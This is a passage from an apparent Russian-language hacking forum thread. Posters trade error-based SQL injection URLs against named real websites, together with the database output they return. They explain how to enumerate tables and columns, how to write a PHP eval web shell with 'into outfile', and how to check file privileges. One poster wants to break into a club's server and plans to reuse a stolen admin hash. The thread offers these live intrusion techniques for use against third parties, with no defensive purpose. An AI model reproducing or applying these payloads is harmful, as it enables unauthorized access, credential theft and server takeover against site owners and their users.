http://spotters.net.ua/file/?id=-1 например сделать как показано выше и раскручивать Apache/2.2.21 (Unix) PHP5/5.2.14 with Suhosin-Patch mod_rpaf/0.6
вот еще: http://spotters.net.ua/admin/ полезно будет. ну и напоследок вот: http://spotters.net.ua/news/entry/?545' http://spotters.net.ua/news/entry/?id=1+or+1+group+by+concat(version(),floor(rand(0)*2)%20)having+min(0)+or+1--+ MySQL ERROR: Duplicate entry '5.0.89-log1' for key 1 SQL error 5я ветка настроение задорное лови пока добрый начинай с этого запроса http://spotters.net.ua/news/entry/?id=1+or+1+group%20by%20concat((select%20concat(0x3a,table_name,0x3a)%20from%20information_schema.tables%20limit%2017,1),floor(rand(0)*2))%20having%20min(0)%20or%201+--+ Duplicate entry ':admin_settings:1' for key 1 перебор лимитом и все получится ну и что бы вопросов совсем не возникло перебор по столбцам делается так: http://spotters.net.ua/news/entry/?id=1+or+1+group%20by%20concat((select%20concat(0x3a,column_name,0x3a)%20from%20information_schema.columns%20where%20table_name='admin_settings'%20limit%200,1),floor(rand(0)*2))%20having%20min(0)%20or%201+--+
Можно ли из бд вытащить пасс от фтп? Имеется уязвимый сайт,скулю крутил через Havij,сайт имеет Pure Ftpd,пасс отдельно храница или в бд?Шелл залить нужно,права доступа только на SELECT команды Еще 1 вопрос:Если добровольно жертва* загрузит шелл себе на пк можно ли будет приконектица? К примеру скачал шелл,закинул его в диск C,теперь чтобы приконектица просто ввести ip/shell.php? или что?
1.пассы от фтп в БД не хранятся ..за оооочень редким исключением 2.ты имеешь в виду пхп шелл? подумай сам и ответь себе на вопрос..ключевое слово пхп
Тебе сначала нужно проникнуть в админку, оттуда залить шелл или через SQL-injection или другими возможными способами. Потом ты уже рутишь сервер / заливаешь на сервер radmin и управляешь им. А шелл допустим ты подкинул жертве...но шелл же написан на php! как он запуститься? чтобы запустился нужен .bat или .exe
Ясно спасибо за советы.Достал хеш самого админа,пароль мудреной ну да ладно,по слухам у него он 1 и тот же на всех его аккаунтах и прочих сервисах,почты. + Почему про шелл спрашивал потому что есть доступ в его клуб и 1 из Пк там сервер,хочу туда залезть,нужна бд.
Залил шелл _http://site.com/images/shell.php.lalalajpg Он не работает, и странице выводится вот это http://i28.fastpic.ru/big/2011/1120/03/8f12609e03abcc163a5e65951a2e3d03.png как сделать так чтобы шелл заработал?
1) http://site.com/index.php?id=-1'+union+select+1,2,'<?php eval($_GET[‘cmd’]) ?>',4+into+outfile+'полный путь/1.php'-- P.S: у пользователя должны быть права на запись 2) http://site.com/index.php?id=-1'+union+select+1,2,File_Priv,4+from+mysql.user+where+user= 'root'-- Если появиться Y то действуй дальше
Это надо у него спросить В общем вопрос состоит в следующем, вот тут в статье thread43966-sql.html есть такой абзац Тыкните пальцем где про это можно почитать? Я знаю что Гугл знает все но что то сегодня мы с ним не дружим) Заранее спасибо!
Ломал Железного Майка , но столкнулся с этим: Code: http://ironmiketyson.ru/article_read.php?id=1+union+select+1+--+ хотя, Code: http://ironmiketyson.ru/article_read.php?id=1+order+by+1+--+ обрабатывается нормально. Раньше не сталкивался...
